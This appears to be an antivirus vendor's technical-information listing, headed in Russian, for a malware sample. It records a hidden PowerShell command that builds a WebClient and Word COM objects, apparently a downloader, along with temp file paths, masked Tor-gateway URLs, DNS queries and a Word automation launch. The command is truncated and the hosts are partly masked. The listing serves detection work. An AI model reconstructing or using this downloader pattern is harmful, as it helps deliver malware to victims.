Техническая информация
- '<SYSTEM32>\cmd.exe' /c start /b powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$word = new-object -ComObject word.application;$random = n...
- %WINDIR%\ServiceProfiles\NetworkService\appdata\local\temp\cab6980.tmp
- %WINDIR%\ServiceProfiles\NetworkService\appdata\local\temp\tar6981.tmp
- %WINDIR%\ServiceProfiles\NetworkService\appdata\local\temp\cab6980.tmp
- %WINDIR%\ServiceProfiles\NetworkService\appdata\local\temp\tar6981.tmp
- http://ur######lmo3krly.onion.nu/15.mov?sh############
- http://62######swhorx34.onion.nu/15.mov?sh############
- http://77######bt5cd6dv.onion.nu/15.mov?sh############
- http://ur######lmo3krly.onion.to/15.mov?sh############
- http://62######swhorx34.onion.to/15.mov?sh############
- http://oc##.#odaddy.com//MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX%2B2yz8LQsgM4CBwQLre%2BWcn4%3D
- DNS ASK ur######lmo3krly.onion.nu
- DNS ASK 62######swhorx34.onion.nu
- DNS ASK 77######bt5cd6dv.onion.nu
- DNS ASK ur######lmo3krly.onion.to
- DNS ASK 62######swhorx34.onion.to
- DNS ASK oc##.#odaddy.com
- '<SYSTEM32>\cmd.exe' /c start /b powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$word = new-object -ComObject word.application;$random = n...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\winword.exe' /Automation -Embedding